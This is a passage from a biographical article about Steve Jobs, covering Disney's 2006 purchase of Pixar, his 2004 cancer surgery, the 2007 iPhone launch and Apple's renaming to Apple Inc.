But in 2005, Michael Eisner was replaced by Bob Iger as the head of the Walt Disney Corporation. The new boss of the Magic Kingdom started talks with Steve to let him sell Disney-owned ABC’s TV shows on thee iTunes video store (which opened in October 2005). This appeasement would lead to a surprise announcement on January 24, 2006: Disney bought Pixar Animation Studios and made Steve Jobs its single largest shareholder, as well as a member of his Board of Directors.

Steve Jobs shakes hands with Disney CEO Bob Iger

Steve Jobs had managed his way back to the top. He had faced terrible difficulties: he had been humiliated, betrayed by his closest collaborators, and had even faced death when, in 2004, he had to endure surgery to cure him from a very rare form of pancreatic cancer (the common form would have killed him in a few months). Yet he is now regarded as one of the most prominent figure in technology, the visionary leader of iconic Apple and a key player of entertainment colossus Disney.

And the story continues as on January 9, 2007, Steve introduced the iPhone, Apple's state-of-the-art mobile phone. With now the iPod and its accessories, the Apple TV (that lets you enjour your digital media on your TV), and the iPhone, it is clear that Apple is not a mere computer company anymore (but has it ever been?) — hence the dropping of the "Computer" in its official name, announced by Steve on that same day. As Apple Computer Inc. becomes Apple Inc., yet another passionating page of Steve Jobs' career is about to be written...

Steve Jobs unveiling the iPhone at Macworld 2007

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